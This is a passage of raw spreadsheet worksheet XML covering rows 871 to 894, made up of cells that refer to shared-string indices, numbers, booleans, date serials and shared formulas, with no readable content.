        <v>44839.54652777778</v>
      </c>
      <c r="I871" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J871" s="1" t="s">
        <v>3787</v>
      </c>
      <c r="K871" s="2" t="s">
        <v>3788</v>
      </c>
      <c r="L871" s="1">
        <v>6.0</v>
      </c>
      <c r="M871" s="1">
        <v>9.0</v>
      </c>
      <c r="N871" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O871" s="1" t="s">
        <v>3790</v>
      </c>
      <c r="P871" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q871" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R871" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S871" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="1">
        <v>10226.0</v>
      </c>
      <c r="B872" s="2" t="s">
        <v>3798</v>
      </c>
      <c r="C872" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D872" s="1" t="s">
        <v>3799</v>
      </c>
      <c r="E872" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F872" s="1" t="s">
        <v>3221</v>
      </c>
      <c r="G872" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H872" s="1" t="s">
        <v>3800</v>
      </c>
      <c r="I872" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J872" s="1" t="s">
        <v>3801</v>
      </c>
      <c r="K872" s="2" t="s">
        <v>3802</v>
      </c>
      <c r="L872" s="1">
        <v>2.0</v>
      </c>
      <c r="M872" s="1">
        <v>2.0</v>
      </c>
      <c r="N872" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O872" s="1" t="s">
        <v>3803</v>
      </c>
      <c r="P872" s="1" t="s">
        <v>2192</v>
      </c>
      <c r="Q872" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R872" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S872" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="1">
        <v>10227.0</v>
      </c>
      <c r="B873" s="2" t="s">
        <v>3804</v>
      </c>
      <c r="C873" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D873" s="2" t="s">
        <v>3805</v>
      </c>
      <c r="E873" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F873" s="1" t="s">
        <v>3806</v>
      </c>
      <c r="G873" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H873" s="4">
        <v>43870.97152777778</v>
      </c>
      <c r="I873" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J873" s="1" t="s">
        <v>3801</v>
      </c>
      <c r="K873" s="2" t="s">
        <v>3802</v>
      </c>
      <c r="L873" s="1">
        <v>2.0</v>
      </c>
      <c r="M873" s="1">
        <v>2.0</v>
      </c>
      <c r="N873" s="1" t="s">
        <v>3803</v>
      </c>
      <c r="O873" s="1" t="s">
        <v>3803</v>
      </c>
      <c r="P873" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q873" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R873" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S873" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="1">
        <v>10228.0</v>
      </c>
      <c r="B874" s="2" t="s">
        <v>3807</v>
      </c>
      <c r="C874" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D874" s="2" t="s">
        <v>3808</v>
      </c>
      <c r="E874" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F874" s="1" t="s">
        <v>3809</v>
      </c>
      <c r="G874" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H874" s="1" t="s">
        <v>3810</v>
      </c>
      <c r="I874" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J874" s="1" t="s">
        <v>3811</v>
      </c>
      <c r="K874" s="2" t="s">
        <v>3812</v>
      </c>
      <c r="L874" s="1">
        <v>3.0</v>
      </c>
      <c r="M874" s="1">
        <v>3.0</v>
      </c>
      <c r="N874" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O874" s="1" t="s">
        <v>3813</v>
      </c>
      <c r="P874" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q874" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R874" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S874" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="1">
        <v>10229.0</v>
      </c>
      <c r="B875" s="2" t="s">
        <v>3814</v>
      </c>
      <c r="C875" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D875" s="2" t="s">
        <v>3815</v>
      </c>
      <c r="E875" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F875" s="1" t="s">
        <v>1464</v>
      </c>
      <c r="G875" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H875" s="1" t="s">
        <v>3816</v>
      </c>
      <c r="I875" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J875" s="1" t="s">
        <v>3811</v>
      </c>
      <c r="K875" s="2" t="s">
        <v>3812</v>
      </c>
      <c r="L875" s="1">
        <v>3.0</v>
      </c>
      <c r="M875" s="1">
        <v>3.0</v>
      </c>
      <c r="N875" s="1" t="s">
        <v>3817</v>
      </c>
      <c r="O875" s="1" t="s">
        <v>3813</v>
      </c>
      <c r="P875" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q875" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R875" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S875" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="1">
        <v>10230.0</v>
      </c>
      <c r="B876" s="2" t="s">
        <v>3818</v>
      </c>
      <c r="C876" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D876" s="2" t="s">
        <v>3819</v>
      </c>
      <c r="E876" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F876" s="1" t="s">
        <v>3820</v>
      </c>
      <c r="G876" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H876" s="1" t="s">
        <v>3821</v>
      </c>
      <c r="I876" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J876" s="1" t="s">
        <v>3811</v>
      </c>
      <c r="K876" s="2" t="s">
        <v>3812</v>
      </c>
      <c r="L876" s="1">
        <v>3.0</v>
      </c>
      <c r="M876" s="1">
        <v>3.0</v>
      </c>
      <c r="N876" s="1" t="s">
        <v>3822</v>
      </c>
      <c r="O876" s="1" t="s">
        <v>3813</v>
      </c>
      <c r="P876" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q876" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R876" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S876" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="1">
        <v>10231.0</v>
      </c>
      <c r="B877" s="2" t="s">
        <v>3823</v>
      </c>
      <c r="C877" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D877" s="2" t="s">
        <v>3824</v>
      </c>
      <c r="E877" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F877" s="1" t="s">
        <v>3825</v>
      </c>
      <c r="G877" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H877" s="1" t="s">
        <v>3826</v>
      </c>
      <c r="I877" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J877" s="1" t="s">
        <v>3827</v>
      </c>
      <c r="K877" s="2" t="s">
        <v>3828</v>
      </c>
      <c r="L877" s="1">
        <v>2.0</v>
      </c>
      <c r="M877" s="1">
        <v>2.0</v>
      </c>
      <c r="N877" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O877" s="1" t="s">
        <v>3829</v>
      </c>
      <c r="P877" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q877" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R877" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S877" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="1">
        <v>10232.0</v>
      </c>
      <c r="B878" s="2" t="s">
        <v>3830</v>
      </c>
      <c r="C878" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D878" s="2" t="s">
        <v>3831</v>
      </c>
      <c r="E878" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F878" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="G878" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H878" s="1" t="s">
        <v>3832</v>
      </c>
      <c r="I878" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J878" s="1" t="s">
        <v>3827</v>
      </c>
      <c r="K878" s="2" t="s">
        <v>3828</v>
      </c>
      <c r="L878" s="1">
        <v>2.0</v>
      </c>
      <c r="M878" s="1">
        <v>2.0</v>
      </c>
      <c r="N878" s="1" t="s">
        <v>3829</v>
      </c>
      <c r="O878" s="1" t="s">
        <v>3829</v>
      </c>
      <c r="P878" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q878" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R878" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S878" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="1">
        <v>10233.0</v>
      </c>
      <c r="B879" s="2" t="s">
        <v>3833</v>
      </c>
      <c r="C879" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D879" s="2" t="s">
        <v>3834</v>
      </c>
      <c r="E879" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F879" s="1" t="s">
        <v>3835</v>
      </c>
      <c r="G879" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H879" s="4">
        <v>43442.714583333334</v>
      </c>
      <c r="I879" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J879" s="1" t="s">
        <v>3836</v>
      </c>
      <c r="K879" s="2" t="s">
        <v>3837</v>
      </c>
      <c r="L879" s="1">
        <v>2.0</v>
      </c>
      <c r="M879" s="1">
        <v>2.0</v>
      </c>
      <c r="N879" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O879" s="1" t="s">
        <v>568</v>
      </c>
      <c r="P879" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q879" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R879" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S879" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="1">
        <v>10234.0</v>
      </c>
      <c r="B880" s="2" t="s">
        <v>3838</v>
      </c>
      <c r="C880" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D880" s="2" t="s">
        <v>3839</v>
      </c>
      <c r="E880" s="2" t="s">
        <v>3840</v>
      </c>
      <c r="F880" s="1" t="s">
        <v>3539</v>
      </c>
      <c r="G880" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H880" s="4">
        <v>43442.79375</v>
      </c>
      <c r="I880" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J880" s="1" t="s">
        <v>3836</v>
      </c>
      <c r="K880" s="2" t="s">
        <v>3837</v>
      </c>
      <c r="L880" s="1">
        <v>2.0</v>
      </c>
      <c r="M880" s="1">
        <v>2.0</v>
      </c>
      <c r="N880" s="1" t="s">
        <v>568</v>
      </c>
      <c r="O880" s="1" t="s">
        <v>568</v>
      </c>
      <c r="P880" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q880" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R880" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S880" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="1">
        <v>10235.0</v>
      </c>
      <c r="B881" s="2" t="s">
        <v>3841</v>
      </c>
      <c r="C881" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D881" s="2" t="s">
        <v>3842</v>
      </c>
      <c r="E881" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F881" s="1" t="s">
        <v>3843</v>
      </c>
      <c r="G881" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H881" s="1" t="s">
        <v>3844</v>
      </c>
      <c r="I881" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J881" s="1" t="s">
        <v>3845</v>
      </c>
      <c r="K881" s="2" t="s">
        <v>3846</v>
      </c>
      <c r="L881" s="1">
        <v>3.0</v>
      </c>
      <c r="M881" s="1">
        <v>4.0</v>
      </c>
      <c r="N881" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O881" s="1" t="s">
        <v>3847</v>
      </c>
      <c r="P881" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q881" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R881" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S881" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="1">
        <v>10236.0</v>
      </c>
      <c r="B882" s="2" t="s">
        <v>3848</v>
      </c>
      <c r="C882" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D882" s="2" t="s">
        <v>3849</v>
      </c>
      <c r="E882" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F882" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G882" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H882" s="1" t="s">
        <v>3850</v>
      </c>
      <c r="I882" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J882" s="1" t="s">
        <v>3845</v>
      </c>
      <c r="K882" s="2" t="s">
        <v>3846</v>
      </c>
      <c r="L882" s="1">
        <v>3.0</v>
      </c>
      <c r="M882" s="1">
        <v>4.0</v>
      </c>
      <c r="N882" s="1" t="s">
        <v>3851</v>
      </c>
      <c r="O882" s="1" t="s">
        <v>3847</v>
      </c>
      <c r="P882" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q882" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R882" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S882" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="1">
        <v>10283.0</v>
      </c>
      <c r="B883" s="2" t="s">
        <v>3852</v>
      </c>
      <c r="C883" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D883" s="2" t="s">
        <v>3853</v>
      </c>
      <c r="E883" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F883" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G883" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H883" s="1" t="s">
        <v>3854</v>
      </c>
      <c r="I883" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J883" s="1" t="s">
        <v>3855</v>
      </c>
      <c r="K883" s="2" t="s">
        <v>3856</v>
      </c>
      <c r="L883" s="1">
        <v>3.0</v>
      </c>
      <c r="M883" s="1">
        <v>6.0</v>
      </c>
      <c r="N883" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O883" s="1" t="s">
        <v>3857</v>
      </c>
      <c r="P883" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q883" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R883" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S883" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="1">
        <v>10320.0</v>
      </c>
      <c r="B884" s="2" t="s">
        <v>3858</v>
      </c>
      <c r="C884" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D884" s="2" t="s">
        <v>3859</v>
      </c>
      <c r="E884" s="2" t="s">
        <v>2547</v>
      </c>
      <c r="F884" s="1" t="s">
        <v>3860</v>
      </c>
      <c r="G884" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H884" s="1" t="s">
        <v>3861</v>
      </c>
      <c r="I884" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J884" s="1" t="s">
        <v>3862</v>
      </c>
      <c r="K884" s="2" t="s">
        <v>3863</v>
      </c>
      <c r="L884" s="1">
        <v>5.0</v>
      </c>
      <c r="M884" s="1">
        <v>8.0</v>
      </c>
      <c r="N884" s="1" t="s">
        <v>315</v>
      </c>
      <c r="O884" s="1" t="s">
        <v>3864</v>
      </c>
      <c r="P884" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q884" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R884" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S884" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="1">
        <v>10321.0</v>
      </c>
      <c r="B885" s="2" t="s">
        <v>3865</v>
      </c>
      <c r="C885" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D885" s="2" t="s">
        <v>3866</v>
      </c>
      <c r="E885" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F885" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G885" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H885" s="1" t="s">
        <v>3867</v>
      </c>
      <c r="I885" s="1" t="s">
        <v>114</v>
      </c>
      <c r="J885" s="1" t="s">
        <v>3868</v>
      </c>
      <c r="K885" s="2" t="s">
        <v>3869</v>
      </c>
      <c r="L885" s="1">
        <v>2.0</v>
      </c>
      <c r="M885" s="1">
        <v>2.0</v>
      </c>
      <c r="N885" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O885" s="1" t="s">
        <v>3870</v>
      </c>
      <c r="P885" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q885" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R885" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S885" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="1">
        <v>10322.0</v>
      </c>
      <c r="B886" s="2" t="s">
        <v>3871</v>
      </c>
      <c r="C886" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D886" s="2" t="s">
        <v>3872</v>
      </c>
      <c r="E886" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F886" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G886" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H886" s="1" t="s">
        <v>3873</v>
      </c>
      <c r="I886" s="1" t="s">
        <v>114</v>
      </c>
      <c r="J886" s="1" t="s">
        <v>3868</v>
      </c>
      <c r="K886" s="2" t="s">
        <v>3869</v>
      </c>
      <c r="L886" s="1">
        <v>2.0</v>
      </c>
      <c r="M886" s="1">
        <v>2.0</v>
      </c>
      <c r="N886" s="1" t="s">
        <v>3870</v>
      </c>
      <c r="O886" s="1" t="s">
        <v>3870</v>
      </c>
      <c r="P886" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q886" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R886" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S886" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="1">
        <v>10323.0</v>
      </c>
      <c r="B887" s="2" t="s">
        <v>3874</v>
      </c>
      <c r="C887" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D887" s="2" t="s">
        <v>3875</v>
      </c>
      <c r="E887" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F887" s="1" t="s">
        <v>3876</v>
      </c>
      <c r="G887" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H887" s="1" t="s">
        <v>3877</v>
      </c>
      <c r="I887" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J887" s="1" t="s">
        <v>3878</v>
      </c>
      <c r="K887" s="2" t="s">
        <v>3879</v>
      </c>
      <c r="L887" s="1">
        <v>2.0</v>
      </c>
      <c r="M887" s="1">
        <v>3.0</v>
      </c>
      <c r="N887" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O887" s="1" t="s">
        <v>3880</v>
      </c>
      <c r="P887" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q887" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R887" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S887" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="1">
        <v>10324.0</v>
      </c>
      <c r="B888" s="2" t="s">
        <v>3881</v>
      </c>
      <c r="C888" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D888" s="2" t="s">
        <v>3882</v>
      </c>
      <c r="E888" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F888" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G888" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H888" s="1" t="s">
        <v>3883</v>
      </c>
      <c r="I888" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J888" s="1" t="s">
        <v>3878</v>
      </c>
      <c r="K888" s="2" t="s">
        <v>3879</v>
      </c>
      <c r="L888" s="1">
        <v>2.0</v>
      </c>
      <c r="M888" s="1">
        <v>3.0</v>
      </c>
      <c r="N888" s="1" t="s">
        <v>3884</v>
      </c>
      <c r="O888" s="1" t="s">
        <v>3880</v>
      </c>
      <c r="P888" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q888" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R888" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S888" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="1">
        <v>10325.0</v>
      </c>
      <c r="B889" s="2" t="s">
        <v>3885</v>
      </c>
      <c r="C889" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D889" s="2" t="s">
        <v>3886</v>
      </c>
      <c r="E889" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F889" s="1" t="s">
        <v>3876</v>
      </c>
      <c r="G889" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H889" s="1" t="s">
        <v>3887</v>
      </c>
      <c r="I889" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J889" s="1" t="s">
        <v>3878</v>
      </c>
      <c r="K889" s="2" t="s">
        <v>3879</v>
      </c>
      <c r="L889" s="1">
        <v>2.0</v>
      </c>
      <c r="M889" s="1">
        <v>3.0</v>
      </c>
      <c r="N889" s="1" t="s">
        <v>3888</v>
      </c>
      <c r="O889" s="1" t="s">
        <v>3880</v>
      </c>
      <c r="P889" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q889" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R889" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S889" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="1">
        <v>10326.0</v>
      </c>
      <c r="B890" s="2" t="s">
        <v>3889</v>
      </c>
      <c r="C890" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D890" s="2" t="s">
        <v>3890</v>
      </c>
      <c r="E890" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F890" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G890" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H890" s="4">
        <v>44448.71111111111</v>
      </c>
      <c r="I890" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J890" s="1" t="s">
        <v>3891</v>
      </c>
      <c r="K890" s="2" t="s">
        <v>3892</v>
      </c>
      <c r="L890" s="1">
        <v>2.0</v>
      </c>
      <c r="M890" s="1">
        <v>3.0</v>
      </c>
      <c r="N890" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O890" s="1" t="s">
        <v>3893</v>
      </c>
      <c r="P890" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q890" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R890" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S890" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="1">
        <v>10327.0</v>
      </c>
      <c r="B891" s="2" t="s">
        <v>3894</v>
      </c>
      <c r="C891" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D891" s="2" t="s">
        <v>3895</v>
      </c>
      <c r="E891" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F891" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G891" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H891" s="4">
        <v>44539.839583333334</v>
      </c>
      <c r="I891" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J891" s="1" t="s">
        <v>3896</v>
      </c>
      <c r="K891" s="2" t="s">
        <v>3892</v>
      </c>
      <c r="L891" s="1">
        <v>2.0</v>
      </c>
      <c r="M891" s="1">
        <v>3.0</v>
      </c>
      <c r="N891" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O891" s="1" t="s">
        <v>3897</v>
      </c>
      <c r="P891" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q891" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R891" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S891" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="1">
        <v>10328.0</v>
      </c>
      <c r="B892" s="2" t="s">
        <v>3898</v>
      </c>
      <c r="C892" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D892" s="2" t="s">
        <v>3796</v>
      </c>
      <c r="E892" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F892" s="1" t="s">
        <v>3899</v>
      </c>
      <c r="G892" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H892" s="1" t="s">
        <v>3900</v>
      </c>
      <c r="I892" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J892" s="1" t="s">
        <v>3891</v>
      </c>
      <c r="K892" s="2" t="s">
        <v>3892</v>
      </c>
      <c r="L892" s="1">
        <v>2.0</v>
      </c>
      <c r="M892" s="1">
        <v>3.0</v>
      </c>
      <c r="N892" s="1" t="s">
        <v>3901</v>
      </c>
      <c r="O892" s="1" t="s">
        <v>3893</v>
      </c>
      <c r="P892" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q892" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R892" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S892" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="1">
        <v>10334.0</v>
      </c>
      <c r="B893" s="2" t="s">
        <v>3902</v>
      </c>
      <c r="C893" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D893" s="2" t="s">
        <v>3895</v>
      </c>
      <c r="E893" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F893" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G893" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H893" s="1" t="s">
        <v>3903</v>
      </c>
      <c r="I893" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J893" s="1" t="s">
        <v>3904</v>
      </c>
      <c r="K893" s="2" t="s">
        <v>3905</v>
      </c>
      <c r="L893" s="1">
        <v>1.0</v>
      </c>
      <c r="M893" s="1">
        <v>1.0</v>
      </c>
      <c r="N893" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O893" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P893" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q893" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R893" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S893" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="1">
        <v>10335.0</v>
      </c>
      <c r="B894" s="2" t="s">
        <v>3902</v>
      </c>
      <c r="C894" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D894" s="2" t="s">
        <v>3895</v>
      </c>
      <c r="E894" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F894" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G894" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H894" s="1" t="s">
        <v>3903</v>
      </c>
      <c r="I894" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J894" s="1" t="s">
        <v>3906</v>
      </c>
      <c r="K894" s="2" t="s">
        <v>3905</v>
      </c>
      <c r="L894" s="1">
        <v>1.0</v>
      </c>
      <c r="M894" s="1">
        <v>1.0</v>
      </c>
      <c r="N894" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O894" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P894" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q894" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R894" s="2">
